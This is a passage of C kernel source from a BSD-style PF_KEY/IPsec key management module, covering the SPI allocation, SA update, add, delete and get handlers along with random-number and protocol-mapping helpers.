sav->refcnt * shows other references to sav * (such as from SPD). */ } } } #ifndef IPSEC_NONBLOCK_ACQUIRE /* ACQ tree */ { struct secacq *acq, *nextacq; LIST_FOREACH_MUTABLE(acq, &acqtree, chain, nextacq) { if (now - acq->created > key_blockacq_lifetime && __LIST_CHAINED(acq)) { LIST_REMOVE(acq, chain); KFREE(acq); } } } #endif /* SP ACQ tree */ LIST_FOREACH_MUTABLE(spacq, &spacqtree, chain, nextspacq) { if (now - spacq->created > key_blockacq_lifetime && __LIST_CHAINED(spacq)) { LIST_REMOVE(spacq, chain); KFREE(spacq); } } /* initialize random seed */ if (key_tick_init_random++ > key_int_random) { key_tick_init_random = 0; key_srandom(); } #ifndef IPSEC_DEBUG2 /* do exchange to tick time !! */ callout_reset(&key_timehandler_ch, hz, key_timehandler, NULL); #endif crit_exit(); return; } /* * to initialize a seed for random() */ static void key_srandom(void) { skrandom(time_second); } u_long key_random(void) { u_long value; key_randomfill(&value, sizeof(value)); return value; } void key_randomfill(void *p, size_t l) { size_t n; u_long v; static int warn = 1; n = (size_t)read_random(p, (u_int)l); /* last resort */ while (n < l) { v = krandom(); bcopy(&v, (u_int8_t *)p + n, l - n < sizeof(v) ? l - n : sizeof(v)); n += sizeof(v); if (warn) { kprintf("WARNING: pseudo-random number generator " "used for IPsec processing\n"); warn = 0; } } } /* * map SADB_SATYPE_* to IPPROTO_*. * if satype == SADB_SATYPE then satype is mapped to ~0. * OUT: * 0: invalid satype. */ static u_int16_t key_satype2proto(u_int8_t satype) { switch (satype) { case SADB_SATYPE_UNSPEC: return IPSEC_PROTO_ANY; case SADB_SATYPE_AH: return IPPROTO_AH; case SADB_SATYPE_ESP: return IPPROTO_ESP; case SADB_X_SATYPE_IPCOMP: return IPPROTO_IPCOMP; default: return 0; } /* NOTREACHED */ } /* * map IPPROTO_* to SADB_SATYPE_* * OUT: * 0: invalid protocol type. */ static u_int8_t key_proto2satype(u_int16_t proto) { switch (proto) { case IPPROTO_AH: return SADB_SATYPE_AH; case IPPROTO_ESP: return SADB_SATYPE_ESP; case IPPROTO_IPCOMP: return SADB_X_SATYPE_IPCOMP; default: return 0; } /* NOTREACHED */ } /* %%% PF_KEY */ /* * SADB_GETSPI processing is to receive * <base, (SA2), src address, dst address, (SPI range)> * from the IKMPd, to assign a unique spi value, to hang on the INBOUND * tree with the status of LARVAL, and send * <base, SA(*), address(SD)> * to the IKMPd. * * IN: mhp: pointer to the pointer to each header. * OUT: NULL if fail. * other if success, return pointer to the message to send. */ static int key_getspi(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_address *src0, *dst0; struct secasindex saidx; struct secashead *newsah; struct secasvar *newsav; struct sockaddr *saddr, *daddr; u_int8_t proto; u_int32_t spi; u_int8_t mode; u_int32_t reqid; int error; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_getspi: NULL pointer is passed.\n"); if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL) { ipseclog((LOG_DEBUG, "key_getspi: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) { ipseclog((LOG_DEBUG, "key_getspi: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_X_EXT_SA2] != NULL) { mode = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_mode; reqid = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_reqid; } else { mode = IPSEC_MODE_ANY; reqid = 0; } src0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_SRC]); dst0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_DST]); /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_getspi: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } /* make sure if port number is zero. */ saddr = (struct sockaddr *)(src0 + 1); daddr = (struct sockaddr *)(dst0 + 1); switch (saddr->sa_family) { case AF_INET: if (saddr->sa_len != sizeof(struct sockaddr_in)) return key_senderror(so, m, EINVAL); ((struct sockaddr_in *)(src0 + 1))->sin_port = 0; break; case AF_INET6: if (saddr->sa_len != sizeof(struct sockaddr_in6)) return key_senderror(so, m, EINVAL); ((struct sockaddr_in6 *)(src0 + 1))->sin6_port = 0; break; default: ; /*???*/ } switch (daddr->sa_family) { case AF_INET: if (daddr->sa_len != sizeof(struct sockaddr_in)) return key_senderror(so, m, EINVAL); ((struct sockaddr_in *)(dst0 + 1))->sin_port = 0; break; case AF_INET6: if (daddr->sa_len != sizeof(struct sockaddr_in6)) return key_senderror(so, m, EINVAL); ((struct sockaddr_in6 *)(dst0 + 1))->sin6_port = 0; break; default: ; /*???*/ } /* XXX boundary check against sa_len */ KEY_SETSECASIDX(proto, mode, reqid, src0 + 1, dst0 + 1, &saidx); /* SPI allocation */ spi = key_do_getnewspi((struct sadb_spirange *)mhp->ext[SADB_EXT_SPIRANGE], &saidx); if (spi == 0) return key_senderror(so, m, EINVAL); /* get a SA index */ if ((newsah = key_getsah(&saidx)) == NULL) { /* create a new SA index */ if ((newsah = key_newsah(&saidx)) == NULL) { ipseclog((LOG_DEBUG, "key_getspi: No more memory.\n")); return key_senderror(so, m, ENOBUFS); } } /* get a new SA */ /* XXX rewrite */ newsav = KEY_NEWSAV(m, mhp, newsah, &error); if (newsav == NULL) { /* XXX don't free new SA index allocated in above. */ return key_senderror(so, m, error); } /* set spi */ newsav->spi = htonl(spi); #ifndef IPSEC_NONBLOCK_ACQUIRE /* delete the entry in acqtree */ if (mhp->msg->sadb_msg_seq != 0) { struct secacq *acq; if ((acq = key_getacqbyseq(mhp->msg->sadb_msg_seq)) != NULL) { /* reset counter in order to deletion by timehandler. */ acq->created = time_second; acq->count = 0; } } #endif { struct mbuf *n; struct sadb_sa *m_sa; struct sadb_msg *newmsg; int off, len; /* create new sadb_msg to reply. */ len = PFKEY_ALIGN8(sizeof(struct sadb_msg)) + PFKEY_ALIGN8(sizeof(struct sadb_sa)); if (len > MCLBYTES) return key_senderror(so, m, ENOBUFS); n = m_getb(len, MB_DONTWAIT, MT_DATA, M_PKTHDR); if (!n) return key_senderror(so, m, ENOBUFS); n->m_len = len; m_copydata(m, 0, sizeof(struct sadb_msg), mtod(n, caddr_t)); off = PFKEY_ALIGN8(sizeof(struct sadb_msg)); m_sa = (struct sadb_sa *)(mtod(n, caddr_t) + off); m_sa->sadb_sa_len = PFKEY_UNIT64(sizeof(struct sadb_sa)); m_sa->sadb_sa_exttype = SADB_EXT_SA; m_sa->sadb_sa_spi = htonl(spi); off += PFKEY_ALIGN8(sizeof(struct sadb_sa)); #ifdef DIAGNOSTIC if (off != len) panic("length inconsistency in key_getspi"); #endif n->m_next = key_gather_mbuf(m, mhp, 0, 2, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST); if (!n->m_next) { m_freem(n); return key_senderror(so, m, ENOBUFS); } if (n->m_len < sizeof(struct sadb_msg)) { n = m_pullup(n, sizeof(struct sadb_msg)); if (n == NULL) return key_sendup_mbuf(so, m, KEY_SENDUP_ONE); } n->m_pkthdr.len = m_lengthm(n, NULL); newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_seq = newsav->seq; newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } } /* * allocating new SPI * called by key_getspi(). * OUT: * 0: failure. * others: success. */ static u_int32_t key_do_getnewspi(struct sadb_spirange *spirange, struct secasindex *saidx) { u_int32_t newspi; u_int32_t min, max; int count = key_spi_trycnt; /* set spi range to allocate */ if (spirange != NULL) { min = spirange->sadb_spirange_min; max = spirange->sadb_spirange_max; } else { min = key_spi_minval; max = key_spi_maxval; } /* IPCOMP needs 2-byte SPI */ if (saidx->proto == IPPROTO_IPCOMP) { u_int32_t t; if (min >= 0x10000) min = 0xffff; if (max >= 0x10000) max = 0xffff; if (min > max) { t = min; min = max; max = t; } } if (min == max) { if (key_checkspidup(saidx, min) != NULL) { ipseclog((LOG_DEBUG, "key_do_getnewspi: SPI %u exists already.\n", min)); return 0; } count--; /* taking one cost. */ newspi = min; } else { /* init SPI */ newspi = 0; /* when requesting to allocate spi ranged */ while (count--) { /* generate pseudo-random SPI value ranged. */ newspi = min + (key_random() % (max - min + 1)); if (key_checkspidup(saidx, newspi) == NULL) break; } if (count == 0 || newspi == 0) { ipseclog((LOG_DEBUG, "key_do_getnewspi: to allocate spi is failed.\n")); return 0; } } /* statistics */ keystat.getspi_count = (keystat.getspi_count + key_spi_trycnt - count) / 2; return newspi; } /* * SADB_UPDATE processing * receive * <base, SA, (SA2), (lifetime(HSC),) address(SD), (address(P),) * key(AE), (identity(SD),) (sensitivity)> * from the ikmpd, and update a secasvar entry whose status is SADB_SASTATE_LARVAL. * and send * <base, SA, (SA2), (lifetime(HSC),) address(SD), (address(P),) * (identity(SD),) (sensitivity)> * to the ikmpd. * * m will always be freed. */ static int key_update(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_sa *sa0; struct sadb_address *src0, *dst0; struct secasindex saidx; struct secashead *sah; struct secasvar *sav; u_int16_t proto; u_int8_t mode; u_int32_t reqid; int error; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_update: NULL pointer is passed.\n"); /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_update: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_EXT_SA] == NULL || mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL || (mhp->msg->sadb_msg_satype == SADB_SATYPE_ESP && mhp->ext[SADB_EXT_KEY_ENCRYPT] == NULL) || (mhp->msg->sadb_msg_satype == SADB_SATYPE_AH && mhp->ext[SADB_EXT_KEY_AUTH] == NULL) || (mhp->ext[SADB_EXT_LIFETIME_HARD] != NULL && mhp->ext[SADB_EXT_LIFETIME_SOFT] == NULL) || (mhp->ext[SADB_EXT_LIFETIME_HARD] == NULL && mhp->ext[SADB_EXT_LIFETIME_SOFT] != NULL)) { ipseclog((LOG_DEBUG, "key_update: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_SA] < sizeof(struct sadb_sa) || mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) { ipseclog((LOG_DEBUG, "key_update: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_X_EXT_SA2] != NULL) { mode = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_mode; reqid = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_reqid; } else { mode = IPSEC_MODE_ANY; reqid = 0; } /* XXX boundary checking for other extensions */ sa0 = (struct sadb_sa *)mhp->ext[SADB_EXT_SA]; src0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_SRC]); dst0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_DST]); /* XXX boundary check against sa_len */ KEY_SETSECASIDX(proto, mode, reqid, src0 + 1, dst0 + 1, &saidx); /* get a SA header */ if ((sah = key_getsah(&saidx)) == NULL) { ipseclog((LOG_DEBUG, "key_update: no SA index found.\n")); return key_senderror(so, m, ENOENT); } /* set spidx if there */ /* XXX rewrite */ error = key_setident(sah, m, mhp); if (error) return key_senderror(so, m, error); /* find a SA with sequence number. */ #ifdef IPSEC_DOSEQCHECK if (mhp->msg->sadb_msg_seq != 0 && (sav = key_getsavbyseq(sah, mhp->msg->sadb_msg_seq)) == NULL) { ipseclog((LOG_DEBUG, "key_update: no larval SA with sequence %u exists.\n", mhp->msg->sadb_msg_seq)); return key_senderror(so, m, ENOENT); } #else if ((sav = key_getsavbyspi(sah, sa0->sadb_sa_spi)) == NULL) { ipseclog((LOG_DEBUG, "key_update: no such a SA found (spi:%u)\n", (u_int32_t)ntohl(sa0->sadb_sa_spi))); return key_senderror(so, m, EINVAL); } #endif /* validity check */ if (sav->sah->saidx.proto != proto) { ipseclog((LOG_DEBUG, "key_update: protocol mismatched (DB=%u param=%u)\n", sav->sah->saidx.proto, proto)); return key_senderror(so, m, EINVAL); } #ifdef IPSEC_DOSEQCHECK if (sav->spi != sa0->sadb_sa_spi) { ipseclog((LOG_DEBUG, "key_update: SPI mismatched (DB:%u param:%u)\n", (u_int32_t)ntohl(sav->spi), (u_int32_t)ntohl(sa0->sadb_sa_spi))); return key_senderror(so, m, EINVAL); } #endif if (sav->pid != mhp->msg->sadb_msg_pid) { ipseclog((LOG_DEBUG, "key_update: pid mismatched (DB:%u param:%u)\n", sav->pid, mhp->msg->sadb_msg_pid)); return key_senderror(so, m, EINVAL); } /* copy sav values */ error = key_setsaval(sav, m, mhp); if (error) { KEY_FREESAV(&sav); return key_senderror(so, m, error); } /* check SA values to be mature. */ if ((mhp->msg->sadb_msg_errno = key_mature(sav)) != 0) { KEY_FREESAV(&sav); return key_senderror(so, m, 0); } { struct mbuf *n; /* set msg buf from mhp */ n = key_getmsgbuf_x1(m, mhp); if (n == NULL) { ipseclog((LOG_DEBUG, "key_update: No more memory.\n")); return key_senderror(so, m, ENOBUFS); } m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } } /* * search SAD with sequence for a SA which state is SADB_SASTATE_LARVAL. * only called by key_update(). * OUT: * NULL : not found * others : found, pointer to a SA. */ #ifdef IPSEC_DOSEQCHECK static struct secasvar * key_getsavbyseq(struct secashead *sah, u_int32_t seq) { struct secasvar *sav; u_int state; state = SADB_SASTATE_LARVAL; /* search SAD with sequence number ? */ LIST_FOREACH(sav, &sah->savtree[state], chain) { KEY_CHKSASTATE(state, sav->state, "key_getsabyseq"); if (sav->seq == seq) { SA_ADDREF(sav); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_getsavbyseq cause " "refcnt++:%d SA:%p\n", sav->refcnt, sav)); return sav; } } return NULL; } #endif /* * SADB_ADD processing * add an entry to SA database, when received * <base, SA, (SA2), (lifetime(HSC),) address(SD), (address(P),) * key(AE), (identity(SD),) (sensitivity)> * from the ikmpd, * and send * <base, SA, (SA2), (lifetime(HSC),) address(SD), (address(P),) * (identity(SD),) (sensitivity)> * to the ikmpd. * * IGNORE identity and sensitivity messages. * * m will always be freed. */ static int key_add(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_sa *sa0; struct sadb_address *src0, *dst0; struct secasindex saidx; struct secashead *newsah; struct secasvar *newsav; u_int16_t proto; u_int8_t mode; u_int32_t reqid; int error; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_add: NULL pointer is passed.\n"); /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_add: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_EXT_SA] == NULL || mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL || (mhp->msg->sadb_msg_satype == SADB_SATYPE_ESP && mhp->ext[SADB_EXT_KEY_ENCRYPT] == NULL) || (mhp->msg->sadb_msg_satype == SADB_SATYPE_AH && mhp->ext[SADB_EXT_KEY_AUTH] == NULL) || (mhp->ext[SADB_EXT_LIFETIME_HARD] != NULL && mhp->ext[SADB_EXT_LIFETIME_SOFT] == NULL) || (mhp->ext[SADB_EXT_LIFETIME_HARD] == NULL && mhp->ext[SADB_EXT_LIFETIME_SOFT] != NULL)) { ipseclog((LOG_DEBUG, "key_add: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_SA] < sizeof(struct sadb_sa) || mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) { /* XXX need more */ ipseclog((LOG_DEBUG, "key_add: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_X_EXT_SA2] != NULL) { mode = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_mode; reqid = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_reqid; } else { mode = IPSEC_MODE_ANY; reqid = 0; } sa0 = (struct sadb_sa *)mhp->ext[SADB_EXT_SA]; src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC]; dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST]; /* XXX boundary check against sa_len */ KEY_SETSECASIDX(proto, mode, reqid, src0 + 1, dst0 + 1, &saidx); /* get a SA header */ if ((newsah = key_getsah(&saidx)) == NULL) { /* create a new SA header */ if ((newsah = key_newsah(&saidx)) == NULL) { ipseclog((LOG_DEBUG, "key_add: No more memory.\n")); return key_senderror(so, m, ENOBUFS); } } /* set spidx if there */ /* XXX rewrite */ error = key_setident(newsah, m, mhp); if (error) { return key_senderror(so, m, error); } /* create new SA entry. */ /* We can create new SA only if SPI is differenct. */ if (key_getsavbyspi(newsah, sa0->sadb_sa_spi)) { ipseclog((LOG_DEBUG, "key_add: SA already exists.\n")); return key_senderror(so, m, EEXIST); } newsav = KEY_NEWSAV(m, mhp, newsah, &error); if (newsav == NULL) { return key_senderror(so, m, error); } /* check SA values to be mature. */ if ((error = key_mature(newsav)) != 0) { KEY_FREESAV(&newsav); return key_senderror(so, m, error); } /* * don't call key_freesav() here, as we would like to keep the SA * in the database on success. */ { struct mbuf *n; /* set msg buf from mhp */ n = key_getmsgbuf_x1(m, mhp); if (n == NULL) { ipseclog((LOG_DEBUG, "key_update: No more memory.\n")); return key_senderror(so, m, ENOBUFS); } m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } } /* m is retained */ static int key_setident(struct secashead *sah, struct mbuf *m, const struct sadb_msghdr *mhp) { const struct sadb_ident *idsrc, *iddst; int idsrclen, iddstlen; /* sanity check */ if (sah == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_setident: NULL pointer is passed.\n"); /* don't make buffer if not there */ if (mhp->ext[SADB_EXT_IDENTITY_SRC] == NULL && mhp->ext[SADB_EXT_IDENTITY_DST] == NULL) { sah->idents = NULL; sah->identd = NULL; return 0; } if (mhp->ext[SADB_EXT_IDENTITY_SRC] == NULL || mhp->ext[SADB_EXT_IDENTITY_DST] == NULL) { ipseclog((LOG_DEBUG, "key_setident: invalid identity.\n")); return EINVAL; } idsrc = (const struct sadb_ident *)mhp->ext[SADB_EXT_IDENTITY_SRC]; iddst = (const struct sadb_ident *)mhp->ext[SADB_EXT_IDENTITY_DST]; idsrclen = mhp->extlen[SADB_EXT_IDENTITY_SRC]; iddstlen = mhp->extlen[SADB_EXT_IDENTITY_DST]; /* validity check */ if (idsrc->sadb_ident_type != iddst->sadb_ident_type) { ipseclog((LOG_DEBUG, "key_setident: ident type mismatch.\n")); return EINVAL; } switch (idsrc->sadb_ident_type) { case SADB_IDENTTYPE_PREFIX: case SADB_IDENTTYPE_FQDN: case SADB_IDENTTYPE_USERFQDN: default: /* XXX do nothing */ sah->idents = NULL; sah->identd = NULL; return 0; } /* make structure */ KMALLOC(sah->idents, struct sadb_ident *, idsrclen); if (sah->idents == NULL) { ipseclog((LOG_DEBUG, "key_setident: No more memory.\n")); return ENOBUFS; } KMALLOC(sah->identd, struct sadb_ident *, iddstlen); if (sah->identd == NULL) { KFREE(sah->idents); sah->idents = NULL; ipseclog((LOG_DEBUG, "key_setident: No more memory.\n")); return ENOBUFS; } bcopy(idsrc, sah->idents, idsrclen); bcopy(iddst, sah->identd, iddstlen); return 0; } /* * m will not be freed on return. * it is caller's responsibility to free the result. */ static struct mbuf * key_getmsgbuf_x1(struct mbuf *m, const struct sadb_msghdr *mhp) { struct mbuf *n; /* sanity check */ if (m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_getmsgbuf_x1: NULL pointer is passed.\n"); /* create new sadb_msg to reply. */ n = key_gather_mbuf(m, mhp, 1, 9, SADB_EXT_RESERVED, SADB_EXT_SA, SADB_X_EXT_SA2, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST, SADB_EXT_LIFETIME_HARD, SADB_EXT_LIFETIME_SOFT, SADB_EXT_IDENTITY_SRC, SADB_EXT_IDENTITY_DST); if (!n) return NULL; if (n->m_len < sizeof(struct sadb_msg)) { n = m_pullup(n, sizeof(struct sadb_msg)); if (n == NULL) return NULL; } mtod(n, struct sadb_msg *)->sadb_msg_errno = 0; mtod(n, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); return n; } static int key_delete_all (struct socket *, struct mbuf *, const struct sadb_msghdr *, u_int16_t); /* * SADB_DELETE processing * receive * <base, SA(*), address(SD)> * from the ikmpd, and set SADB_SASTATE_DEAD, * and send, * <base, SA(*), address(SD)> * to the ikmpd. * * m will always be freed. */ static int key_delete(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_sa *sa0; struct sadb_address *src0, *dst0; struct secasindex saidx; struct secashead *sah; struct secasvar *sav = NULL; u_int16_t proto; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_delete: NULL pointer is passed.\n"); /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_delete: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL) { ipseclog((LOG_DEBUG, "key_delete: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) { ipseclog((LOG_DEBUG, "key_delete: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_EXT_SA] == NULL) { /* * Caller wants us to delete all non-LARVAL SAs * that match the src/dst. This is used during * IKE INITIAL-CONTACT. */ ipseclog((LOG_DEBUG, "key_delete: doing delete all.\n")); return key_delete_all(so, m, mhp, proto); } else if (mhp->extlen[SADB_EXT_SA] < sizeof(struct sadb_sa)) { ipseclog((LOG_DEBUG, "key_delete: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } sa0 = (struct sadb_sa *)mhp->ext[SADB_EXT_SA]; src0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_SRC]); dst0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_DST]); /* XXX boundary check against sa_len */ KEY_SETSECASIDX(proto, IPSEC_MODE_ANY, 0, src0 + 1, dst0 + 1, &saidx); /* get a SA header */ LIST_FOREACH(sah, &sahtree, chain) { if (sah->state == SADB_SASTATE_DEAD) continue; if (key_cmpsaidx(&sah->saidx, &saidx, CMP_HEAD) == 0) continue; /* get a SA with SPI. */ sav = key_getsavbyspi(sah, sa0->sadb_sa_spi); if (sav) break; } if (sah == NULL) { ipseclog((LOG_DEBUG, "key_delete: no SA found.\n")); return key_senderror(so, m, ENOENT); } key_sa_chgstate(sav, SADB_SASTATE_DEAD); KEY_FREESAV(&sav); { struct mbuf *n; struct sadb_msg *newmsg; /* create new sadb_msg to reply. */ n = key_gather_mbuf(m, mhp, 1, 4, SADB_EXT_RESERVED, SADB_EXT_SA, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST); if (!n) return key_senderror(so, m, ENOBUFS); if (n->m_len < sizeof(struct sadb_msg)) { n = m_pullup(n, sizeof(struct sadb_msg)); if (n == NULL) return key_senderror(so, m, ENOBUFS); } newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } } /* * delete all SAs for src/dst. Called from key_delete(). */ static int key_delete_all(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp, u_int16_t proto) { struct sadb_address *src0, *dst0; struct secasindex saidx; struct secashead *sah; struct secasvar *sav, *nextsav; u_int stateidx, state; struct mbuf *n; struct sadb_msg *newmsg; src0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_SRC]); dst0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_DST]); /* XXX boundary check against sa_len */ KEY_SETSECASIDX(proto, IPSEC_MODE_ANY, 0, src0 + 1, dst0 + 1, &saidx); LIST_FOREACH(sah, &sahtree, chain) { if (sah->state == SADB_SASTATE_DEAD) continue; if (key_cmpsaidx(&sah->saidx, &saidx, CMP_HEAD) == 0) continue; /* Delete all non-LARVAL SAs. */ for (stateidx = 0; stateidx < NELEM(saorder_state_alive); stateidx++) { state = saorder_state_alive[stateidx]; if (state == SADB_SASTATE_LARVAL) continue; LIST_FOREACH_MUTABLE(sav, &sah->savtree[state], chain, nextsav) { /* sanity check */ if (sav->state != state) { ipseclog((LOG_DEBUG, "key_delete_all: " "invalid sav->state " "(queue: %d SA: %d)\n", state, sav->state)); continue; } key_sa_chgstate(sav, SADB_SASTATE_DEAD); KEY_FREESAV(&sav); } } } /* create new sadb_msg to reply. */ n = key_gather_mbuf(m, mhp, 1, 3, SADB_EXT_RESERVED, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST); if (!n) return key_senderror(so, m, ENOBUFS); if (n->m_len < sizeof(struct sadb_msg)) { n = m_pullup(n, sizeof(struct sadb_msg)); if (n == NULL) return key_senderror(so, m, ENOBUFS); } newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } /* * SADB_GET processing * receive * <base, SA(*), address(SD)> * from the ikmpd, and get a SP and a SA to respond, * and send, * <base, SA, (lifetime(HSC),) address(SD), (address(P),) key(AE), * (identity(SD),) (sensitivity)> * to the ikmpd. * * m will always be freed. */ static int key_get(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_sa *sa0; struct sadb_address *src0, *dst0; struct secasindex saidx; struct secashead *sah; struct secasvar *sav = NULL; u_int16_t proto; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_get: NULL pointer is passed.\n"); /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_get: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_EXT_SA] == NULL || mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL) { ipseclog((LOG_DEBUG, "key_get: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_SA] < sizeof(struct sadb_sa) || mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) { ipseclog((LOG_DEBUG, "key_get: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } sa0 = (struct sadb_sa *)mhp->ext[SADB_EXT_SA]; src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC]; dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST]; /* XXX boundary check against sa_len */ KEY_SETSECASIDX(proto, IPSEC_MODE_ANY, 0, src0 + 1, dst0 + 1, &saidx); /* get a SA header */ LIST_FOREACH(sah, &sahtree, chain) { if (sah->state == SADB_SASTATE_DEAD) continue; if (key_cmpsaidx(&sah->saidx, &saidx, CMP_HEAD) == 0) continue; /* get a SA with SPI. */ sav = key_getsavbyspi(sah, sa0->sadb_sa_spi); if (sav) break; } if (sah == NULL) { ipseclog((LOG_DEBUG, "key_get: no SA found.\n")); return key_senderror(so, m, ENOENT); } { struct mbuf *n; u_int8_t satype; /* map proto to satype */ if ((satype = key_proto2satype(sah->saidx.proto)) == 0) { ipseclog((LOG_DEBUG, "key_get: there was invalid proto in SAD.\n")); return key_senderror(so, m, EINVAL); } /* create new sadb_msg to reply. */ n = key_setdumpsa(sav, SADB_GET, satype, mhp->msg->sadb_msg_seq, mhp->msg->sadb_msg_pid); if (!n) return key_senderror(so, m, ENOBUFS); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } } /* XXX make it sysctl-configurable? */ static void key_getcomb_setlifetime(struct sadb_comb *comb) { comb->sadb_comb_soft_allocations = 1; comb->sadb_comb_hard_allocations = 1; comb->sadb_comb_soft_bytes = 0; comb->sadb_comb_hard_bytes = 0; comb->sadb_comb_hard_addtime = 86400; /* 1 day */ comb->sadb_comb_soft_addtime = comb->sadb_comb_soft_addtime * 80 / 100; comb->sadb_comb_soft_usetime = 28800; /* 8 hours */ 